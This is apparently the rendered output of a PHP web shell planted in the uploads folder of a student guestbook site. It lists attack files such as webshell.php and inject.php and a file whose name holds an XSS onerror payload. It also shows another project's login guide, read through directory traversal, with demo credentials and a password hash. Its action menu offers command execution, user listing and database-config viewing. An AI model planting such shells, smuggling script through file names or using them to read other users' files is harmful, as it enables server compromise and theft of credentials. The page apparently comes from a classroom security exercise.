๐Ÿš WEB SHELL ACTIVATED

๐Ÿ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

๐Ÿ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
๐Ÿ“ ..
๐Ÿ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
๐Ÿ“„ 0tk5j14v024b1.jpg [view]
๐Ÿ“„ 300px-Cursed_Cat.jpg [view]
๐Ÿ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
๐Ÿ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
๐Ÿ“„ CV Jasper Kramp.png [view]
๐Ÿ“„ Cat profile.png [view]
๐Ÿ“„ Fronalpstock_big.jpg [view]
๐Ÿ“„ Krik en las.jpg [view]
๐Ÿ“„ Krik.jpg [view]
๐Ÿ“„ Pino-dood-03.jpg [view]
๐Ÿ“„ Shellz.php [view]
๐Ÿ“„ Ted_Kaczynski_2_(cropped).jpg [view]
๐Ÿ“„ Tux.svg.png [view]
๐Ÿ“„ Z.png [view]
๐Ÿ“„ android.jpg [view]
๐Ÿ“„ apple.php [view]
๐Ÿ“„ cianancatfish.jpg [view]
๐Ÿ“„ downloads (1).jpeg [view]
๐Ÿ“„ downloads.jpeg [view]
๐Ÿ“„ epresso.jpg [view]
๐Ÿ“„ fake_photo.png [view]
๐Ÿ“„ hand.jpg [view]
๐Ÿ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
๐Ÿ“„ image.png [view]
๐Ÿ“„ images.jpeg [view]
๐Ÿ“„ info.php [view]
๐Ÿ“„ inject.php [view]
๐Ÿ“„ instant_redirect.jpg [view]
๐Ÿ“„ japper.jpg [view]
๐Ÿ“„ koekiemonster-3.jpg [view]
๐Ÿ“„ logo.png [view]
๐Ÿ“„ muis.jpg [view]
๐Ÿ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
๐Ÿ“„ picobellobv.jpeg [view]
๐Ÿ“„ redirect.php [view]
๐Ÿ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
๐Ÿ“„ sdfsa.png [view]
๐Ÿ“„ sneaky.svg [view]
๐Ÿ“„ taylor.webp [view]
๐Ÿ“„ test.html [view]
๐Ÿ“„ testpreg.php [view]
๐Ÿ“„ testpreg1.php [view]
๐Ÿ“„ testtest.php.JPG [view]
๐Ÿ“„ ultimate_attack.gif [view]
๐Ÿ“„ ultimate_attack.php [view]
๐Ÿ“„ ultimate_attack.svg [view]
๐Ÿ“„ wallpaper.jpg [view]
๐Ÿ“„ webshell.php [view]

๐Ÿ“„ Viewing: ./../../l7-pro-2-e-learning-2023-Epolleke/LOGIN_GUIDE.md

# ๐Ÿ” Login System - Quick Start Guide

## Features Added

โœ… **User Registration** - Create new accounts  
โœ… **User Login** - Secure authentication  
โœ… **Session Management** - Stay logged in  
โœ… **User Progress Tracking** - Save progress per user  
โœ… **Guest Mode** - Practice without account  

## ๐Ÿš€ Quick Start

### Access the Application

1. **Open**: http://localhost/login.html
2. **Login with demo account**:
   - Username: `demo`
   - Password: `demo123`
3. **Or create a new account**

### Demo Account

The database comes pre-loaded with a demo account:

```
Username: demo
Password: demo123
```

## ๐Ÿ“ How It Works

### 1. **Login Page** (`login.html`)
- Beautiful auth interface
- Login form
- Registration form
- Guest access option

### 2. **User Flow**

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ login.html  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜
       โ”‚
       โ”œโ”€โ–บ Login โ”€โ”€โ”€โ”€โ”€โ”€โ–บ Main App (logged in)
       โ”‚
       โ”œโ”€โ–บ Register โ”€โ”€โ”€โ–บ Login โ”€โ”€โ–บ Main App
       โ”‚
       โ””โ”€โ–บ Guest โ”€โ”€โ”€โ”€โ”€โ”€โ–บ Main App (guest mode)
```

### 3. **API Endpoints**

#### Register New User
```javascript
POST /php/register.php
{
  "username": "john",
  "email": "john@example.com",
  "password": "secret123",
  "full_name": "John Doe"
}
```

#### Login
```javascript
POST /php/login.php
{
  "username": "demo",
  "password": "demo123"
}
```

#### Check Auth Status
```javascript
GET /php/check_auth.php
```

#### Logout
```javascript
POST /php/logout.php
```

## ๐Ÿ—„๏ธ Database Changes

### New Table: `users`

```sql
CREATE TABLE users (
    user_id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50) UNIQUE,
    email VARCHAR(100) UNIQUE,
    password_hash VARCHAR(255),
    full_name VARCHAR(100),
    created_at TIMESTAMP,
    last_login TIMESTAMP,
    is_active BOOLEAN
);
```

### Updated Table: `user_progress`

Now tracks progress per user:

```sql
ALTER TABLE user_progress ADD COLUMN user_id INT;
```

## ๐ŸŽจ Features

### Header Changes
- Shows username when logged in
- Logout button
- Login button for guests

### Progress Tracking
- **Logged in users**: Progress saved to database
- **Guest users**: Progress in session only

## ๐Ÿ“ฑ Usage Examples

### 1. Create Account

```javascript
// Navigate to login page
http://localhost/login.html

// Click "Register here"
// Fill form:
- Username: myuser
- Email: myuser@example.com  
- Password: mypass123
- Confirm: mypass123

// Click "Create Account"
// Automatically redirected to login
```

### 2. Login

```javascript
// Enter credentials:
- Username: demo
- Password: demo123

// Click "Login"
// Redirected to main app
// Username shown in header
```

### 3. Practice as User

```javascript
// All progress is saved to your account
// View your statistics
// Progress persists across sessions
```

### 4. Continue as Guest

```javascript
// Click "Continue as Guest"
// Practice without account
// Progress NOT saved
```

## ๐Ÿ”’ Security Features

โœ… **Password Hashing** - BCrypt encryption  
โœ… **SQL Injection Protection** - Prepared statements  
โœ… **Session Management** - Secure PHP sessions  
โœ… **Input Validation** - Server-side validation  
โœ… **XSS Protection** - Sanitized outputs  

## ๐Ÿงช Testing

### Test Registration

1. Go to: http://localhost/login.html
2. Click "Register here"
3. Create account with:
   - Username: testuser
   - Email: test@test.com
   - Password: test123
4. Should see success message

### Test Login

1. Use demo account or your new account
2. Should redirect to main app
3. Username should appear in header

### Test Logout

1. Click "Logout" in header
2. Should redirect to login page
3. Session cleared

### Test Guest Mode

1. Click "Continue as Guest"
2. Can practice normally
3. No username in header
4. Progress not saved

## ๐Ÿ› Troubleshooting

### "Username already exists"
- Username must be unique
- Try different username

### "Invalid username or password"
- Check caps lock
- Verify password is correct
- Use demo account to test

### Can't see login button
- Clear browser cache
- Hard refresh: Ctrl+F5

### Session not persisting
- Check browser cookies enabled
- Clear cookies and try again

## ๐Ÿ“Š Database Management

### View Users

```sql
-- Open phpMyAdmin: http://localhost:8080
SELECT * FROM users;
```

### Create Admin User

```sql
INSERT INTO users (username, email, password_hash, full_name)
VALUES (
    'admin',
    'admin@example.com',
    '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi',
    'Administrator'
);
-- Password: password
```

### Reset User Password

```php
// Generate new hash
$new_hash = password_hash('newpassword123', PASSWORD_BCRYPT);
echo $new_hash;

// Update database
UPDATE users 
SET password_hash = '$2y$10$...' 
WHERE username = 'demo';
```

## ๐ŸŽฏ Next Steps

1. โœ… Login system is working
2. โœ… User registration available
3. โœ… Progress tracking implemented
4. ๐Ÿ“ง Add email verification (optional)
5. ๐Ÿ” Add password reset (optional)
6. ๐Ÿ‘ฅ Add user profiles (optional)

## ๐ŸŽ‰ Success!

Your English Vocabulary Learning app now has:
- โœ… Full authentication system
- โœ… User registration
- โœ… Secure login
- โœ… Progress tracking per user
- โœ… Guest mode option

**Try it now**: http://localhost/login.html

Login with:
- Username: `demo`
- Password: `demo123`

---

**Happy Learning! ๐ŸŽ“**

๐ŸŽฏ Available Actions

Command Execution:

Quick Commands:

๐Ÿ“‹ List files | ๐Ÿ‘ค Show user | ๐Ÿ“ Show directory | ๐Ÿ”„ Show processes | ๐Ÿ” Show users

File Operations:

โฌ†๏ธ Parent directory | ๐Ÿ  Root directory | ๐Ÿ” View DB config
โš ๏ธ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!